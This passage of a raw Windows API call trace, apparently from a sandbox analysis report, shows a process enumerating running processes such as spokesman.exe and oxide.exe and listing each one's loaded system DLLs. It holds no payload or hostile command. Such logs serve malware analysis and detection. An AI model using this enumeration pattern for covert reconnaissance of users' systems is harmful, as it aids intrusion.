	[0106.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.232] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.233] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.234] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.235] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 0
	[0106.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 19
	[0106.235] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spokesman.exe")) returned 1
	[0106.236] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xf60) returned 0x864
	[0106.261] Module32FirstW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.262] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.263] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.263] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.264] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.265] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.266] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.266] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.267] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.268] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.268] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.269] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.270] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.271] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.271] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.272] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.273] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.274] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.274] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 0
	[0106.275] Module32FirstW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office 15\\spokesman.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office 15\\spokesman.exe", lpUsedDefaultChar=0x0) returned 51
	[0106.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 14
	[0106.276] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.277] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.278] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.279] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.279] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.280] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.281] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.282] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.283] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.284] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.285] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.286] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.286] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.287] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.288] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.289] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.290] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 1
	[0106.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.290] Module32NextW (hSnapshot=0x864, lpme=0x20af280) returned 0
	[0106.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 14
	[0106.361] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="oxide.exe")) returned 1
	[0106.362] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xf78) returned 0x868
	[0106.371] Module32FirstW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.372] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.373] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.374] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.374] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.375] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.376] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.377] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.377] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.378] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.379] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.380] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.380] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.381] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.382] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.383] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.383] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.384] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.385] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 0
	[0106.386] Module32FirstW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Mozilla Maintenance Service\\oxide.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Mozilla Maintenance Service\\oxide.exe", lpUsedDefaultChar=0x0) returned 61
	[0106.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 10
	[0106.387] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.388] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.389] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.390] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.390] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.391] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.392] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.393] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
